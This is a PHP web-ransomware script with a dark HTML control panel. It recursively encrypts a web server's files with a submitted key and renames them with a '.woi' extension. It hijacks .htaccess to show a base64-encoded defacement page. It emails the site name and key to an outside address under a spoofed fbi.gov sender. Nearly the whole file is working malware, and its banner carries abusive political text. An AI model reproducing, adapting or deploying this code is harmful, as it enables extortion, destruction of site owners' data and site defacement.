Ransom PHP Server

1.  
2. <!DOCTYPE html>
3.  
4. <html>
5. <head>
6. <title>Defeat!</title>
7. <style type="text/css">
8. body {
9. background: #1A1C1F;
10. color: #e2e2e2;
11. }
12. .inpute{
13. border-style: dotted;
14. border-color: #379600;
15. background-color: transparent;
16. color: white;
17. text-align: center;
18. }
19. .selecte{
20. border-style: dotted;
21. border-color: green;
22. background-color: transparent;
23. color: green;
24. }
25. .submite {
26. border-style: dotted;
27. border-color: #4CAF50;
28. background-color: transparent;
29. color: white;
30. }
31. .result{
32. text-align: left;
33. }
34. </style>
35. <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
36. </head>
37. <body>
38. <div class="result">
39. <?php
40. error_reporting(0);
41. set_time_limit(0);
42. ini_set('memory_limit', '-1');
43. class deRanSomeware
44. {
45. public function shcpackInstall(){
46. if(!file_exists(".htashor7cut")){
47. rename(".htaccess", ".htashor7cut");
48. if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex shor7cut.php\r\nErrorDocument 404 /shor7cut.php")){
49. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
50. }
51. if(file_put_contents("x.dick", base64_decode("PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgPHRpdGxlPldBUk5JTkc8L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgpib2R5IHsKICAgIGJhY2tncm91bmQ6ICMxQTFDMUY7CiAgICBjb2xvcjogI2UyZTJlMjsKfQphewogICBjb2xvcjpncmVlbjsKfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5Pgo8Y2VudGVyPgo8cHJlPgogICAgICAKICAgICAgICAgICAgLi0iIi0uCiAgICAgICAgICAgLyAuLS0uIFwKICAgICAgICAgIC8gLyAgICBcIFwKICAgICAgICAgIHwgfCAgICB8IHwKICAgICAgICAgIHwgfC4tIiItLnwKICAgICAgICAgLy8vYC46Ojo6LmBcCiAgICAgICAgfHx8IDo6LyAgXDo6IDsKICAgICAgICB8fDsgOjpcX18vOjogOwogICAgICAgICBcXFwgJzo6OjonIC8KICAgICAgICAgIGA9JzotLi4tJ2AKLVsgSXNsYW0gaXMgbWFzcyBraWxsZWQsIHRoZSB3b3JsZCBpcyBzaWxlbnQsIElzbGFtIGFyaXNlcyBhbmQgcmV0YWxpYXRlcyBhbmQgaXMgY2FsbGVkIGEgdGVycm9yaXN0LiBBbGwgb2YgeW91IHNvbiBvZiBhIGJpdGNoIF0tCjwvYnI+SW5kb25lc2lhbiBIYWNrZXIgUnVsZXogQDIwMjAKPC9wcmU+CjwvY2VudGVyPgo8L2JvZHk+CjwvaHRtbD4="))){
52. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> shor7cut.php (Default Page)<br>';
53. }
54. }
55. }
56. public function shcpackUnstall(){
57.  
58. if( file_exists(".htashor7cut") ){
59. if( unlink(".htaccess") && unlink("0byte.php") ){
60. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
61. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> 0byte.php (Default Page)<br>';
62. }
63. rename(".htashor7cut", ".htaccess");
64. }
65.  
66. }
67.  
68. public function plus(){
69. flush();
70. ob_flush();
71. }
72. public function locate(){
73. return getcwd();
74. }
75. public function shcdirs($dir,$method,$key){
76. switch ($method) {
77. case '1':
78. deRanSomeware::shcpackInstall();
79. break;
80. case '2':
81. deRanSomeware::shcpackUnstall();
82. break;
83. }
84. foreach(scandir($dir) as $d)
85. {
86. if($d!='.' && $d!='..')
87. {
88. $locate = $dir.DIRECTORY_SEPARATOR.$d;
89. if(!is_dir($locate)){
90. if( deRanSomeware::kecuali($locate,"con7ext.php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"0byte.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htashor7cut") ){
91. switch ($method) {
92. case '1':
93. deRanSomeware::shcEnCry($key,$locate);
94. deRanSomeware::shcEnDesDirS($locate,"1");
95. break;
96. case '2':
97. deRanSomeware::shcDeCry($key,$locate);
98. deRanSomeware::shcEnDesDirS($locate,"2");
99. break;
100. }
101. }
102. }else{
103. deRanSomeware::shcdirs($locate,$method,$key);
104. }
105. }
106. deRanSomeware::plus();
107. }
108. deRanSomeware::report($key);
109. }
110.  
111. public function report($key){
112. $message.= "========= Jakarta BlackHat =========\n";
113. $message.= "Website : ".$_SERVER['HTTP_HOST'];
114. $message.= "Key : ".$key;
115. $to = "Email : jembutgan@protonmail.com\n";
116. $message.= "========= Jakarta BlackHat =========\n";
117. $subject = "Infected Ransomware\n";
118. $headers = "From: VictiM <ransomware@fbi.gov>\r\n";
119. mail($to,$subject,$message,$headers);
120. }
121.  
122. public function shcEnDesDirS($locate,$method){
123. switch ($method) {
124. case '1':
125. rename($locate, $locate.".woi");
126. break;
127. case '2':
128. $locates = str_replace(".woi", "", $locate);
129. rename($locate, $locates);
130. break;
131. }
132. }
133.  
134. public function shcEnCry($key,$locate){
135. $data = file_get_contents($locate);
136. $iv = mcrypt_create_iv(
137. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
138. MCRYPT_DEV_URANDOM
139. );
140.  
141. $encrypted = base64_encode(
142. $iv .
143. mcrypt_encrypt(
144. MCRYPT_RIJNDAEL_128,
145. hash('sha256', $key, true),
146. $data,
147. MCRYPT_MODE_CBC,
148. $iv
149. )
150. );
151. if(file_put_contents($locate, $encrypted )){
152. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
153. }else{
154. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>';
155. }
156. }
157.  
158. public function shcDeCry($key,$locate){
159. $data = base64_decode( file_get_contents($locate) );
160. $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
161.  
162. $decrypted = rtrim(
163. mcrypt_decrypt(
164. MCRYPT_RIJNDAEL_128,
165. hash('sha256', $key, true),
166. substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
167. MCRYPT_MODE_CBC,
168. $iv
169. ),
170. "\0"
171. );
172. if(file_put_contents($locate, $decrypted )){
173. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
174. }else{
175. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
176. }
177. }
178.  
179.  
180.  
181. public function kecuali($ext,$name){
182. $re = "/({$name})/";
183. preg_match($re, $ext, $matches);
184. if($matches[1]){
185. return false;
186. }
187. return true;
188. }
189. }
190.  
191. if($_POST['submit']){
192. switch ($_POST['method']) {
193. case '1':
194. deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']);
195. break;
196. case '2':
197. deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']);
198. break;
199. }
200. }else{
201. ?>
202. <center>
203. <pre>
204.  
205. .-""-.
206. / .--. \
207. / / \ \
208. | | | |
209. | |.-""-.|
210. ///`.::::.`\
211. ||| ::/ \:: ;
212. ||; ::\__/:: ;
213. \\\ '::::x' /
214. `=':-..-'`
215. Indonesian Hacker Rulez @2020
216. -[ Islam is mass killed, the world is silent, Islam arises and retaliates and is called a terrorist. All of you son of a bitch ]-
217. </pre>
218. <form action="" method="post" style=" text-align: center;">
219. <label>Key : </label>
220. <input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC">
221. <select name="method" class="selecte">
222. <option value="1">Infection</option>
223. <option value="2">DeInfection</option>
224. </select>
225. <input type="submit" name="submit" class="submite" value="Submit" />
226. </form>
227. <?php
228. }?>
229. </div>
230. </body>
231. </html>
232.  
233.  
234. <?php
235.  
236. ?>